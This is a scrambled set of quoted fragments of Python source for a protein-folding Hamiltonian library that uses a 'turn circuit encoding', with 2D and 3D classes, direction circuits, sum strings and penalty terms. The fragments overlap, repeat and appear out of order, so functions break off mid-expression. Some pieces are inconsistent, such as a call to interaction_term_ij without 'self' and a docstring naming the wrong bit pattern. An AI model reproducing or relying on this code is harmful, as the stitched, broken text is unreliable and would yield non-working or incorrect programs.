q_i, q_j, q_k): \"\"\"Implements a", "moves in the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self,", "sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\", "\"\"\"Ensures that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)),", "\\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "trange from copy import deepcopy from itertools import chain from functools import reduce", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0", "j)] elif k == 
'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit", "self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not", "return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for", "self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self):", "% k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x',", "that returns 1 if the chain moves in the direction y+.\"\"\" return q_i*q_j", "and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i)", "t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)])", "return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a", "+ \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that", "the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that", "half-adder.\"\"\" return qand([q_i, q_j]), 
qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian):", "'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'),", "j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def", "counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1])", "return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1", "i-j !=0 else 0 if maximum == 0: return 0 prefactor = qand([", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([", "(self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr", "def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian", "encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits", "qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\", "< 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i,", "2 == 0: iterator = range(0, t+1, 2) if t > 0 else", "as sp import symengine as se from abc import * from tqdm import", "q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self):", "(1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical", "from tqdm import tqdm, trange from copy import deepcopy from itertools import chain", "elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), 
self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat", "in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "+ \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if", "= [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+':", "if the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) *", "!=0 else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r],", "= qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)])", "i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues", "self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i,", "def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string", "sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does", "self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1],", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum", "returns 1 if the chain moves in the direction 
x+.\"\"\" return (1-q_i)*q_j def", "tqdm, trange from copy import deepcopy from itertools import chain from functools import", "> 1 else [1] for h in iterator: if self.ss_fmat == 'babej': if", "(1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "* qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1],", "self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures", "the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that", "that returns 1 if the chain moves in the direction y+.\"\"\" return q_i", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j):", "for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "= np.zeros(n_layers) # lazy way to keep track of half-adders sum_string = list(reversed(sum_string))", "in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] *", "= len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return", "the expression and methods of a protein hamiltonian of the \"turn circuit encoding\"", "self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "copy import deepcopy from itertools import chain from functools import reduce from .qlogic", "0: continue expr += self.interaction_term_ij(i, 
1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True", "direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k):", "k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else:", "for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the", "3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "for t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([", "y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit =", "k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return prefactor *", "x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements", "'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') }", "expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def", "return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r", "i, j): \"\"\"Computes 
the overlap term for residues i and j.\"\"\" maximum =", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r])", "'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand(", "class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1,", "the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit", "import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self,", "se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the", "def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3):", "def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "j, k)] def back_term(self): \"\"\"Ensures that the chain does not go back on", "\\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r])", "= { 'x+': self.sum_string(i, j, 'x+'), 
'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j,", "direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k):", "k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for", "the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j):", "on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r", "self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "\\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1,", "list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator", "'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "+ \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * 
self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self,", "p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] *", "the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j,", "k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and", "direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns", "1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum", "( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)])", "0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r])", "1 if the chain moves in the direction x+.\"\"\" return q_i * q_j", "\"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat =", "list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j,", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "-1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i,", "import chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import", "= True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a", "% 2 == 0: iterator = range(0, t+1, 2) if t > 0", "a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum =", "self.get(self.pointer(i)+2)) * 
self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j) return expr", "'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else", "in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i,", "[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers", "track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "and methods of a protein hamiltonian of the \"turn circuit encoding\" form, described", "== 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)])", "def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of the", "\\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in", "* (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i >", "self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self,", "that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), 
self.get(self.pointer(k)+1), self.get(self.pointer(k)+2))", "that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j", "range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\", "+ sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1,", "for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([", "return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "import numpy as np import sympy as sp import symengine as se from", "== 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1", "expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if", "nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j,", "range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures", "n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep track of", "chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements", "(1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j))", "prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers)", "# lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for t", "k in ['y', 'z']]) return prefactor * \\ ( 
qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ *", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "== 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property", "in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h]", "sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ +", "self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way", "circuit that returns 1 if the chain moves in the direction y-.\"\"\" return", "def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x", "\"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j", "k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "+ sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1,", "ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to", "np 
import sympy as sp import symengine as se from abc import *", "for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] )", "return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def", "t > 1 else [1] for h in iterator: if self.ss_fmat == 'babej':", "+ \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between", "return (1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for", "* qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2],", "sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j]", "= ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def", "sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ *", "(1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0])", "sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ *", "(1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if", "elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term 
that penalises meaningless residue", "the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "in the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i,", "j-i-1 counter = np.zeros(n_layers) # lazy way to keep track of half-adders sum_string", "\\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)),", "returns 1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def", "circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k)", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum =", "k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return prefactor *", "* qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1],", "\\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in", "self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 *", "== 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "i-j != 0 else 0 if (j-i) % 2 != 0 or maximum", "as se from abc import * from tqdm import tqdm, trange from copy", "k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\", "k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "for 
r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in", "j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if", "+ \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that", "j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\", "if t > 1 else [1] for h in iterator: if self.ss_fmat ==", "self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return", "* \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in", "self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings", "that returns 1 if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j", "self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term()", "else 0 if (j-i) % 2 != 0 or maximum < 2: return", "counter = np.zeros(n_layers) # lazy way to keep track of half-adders sum_string =", "chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def", "sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "the sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i,", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)),", "chain moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def", "chain moves in the direction x+.\"\"\" return q_i * q_j * q_k def", "'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0", "q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): 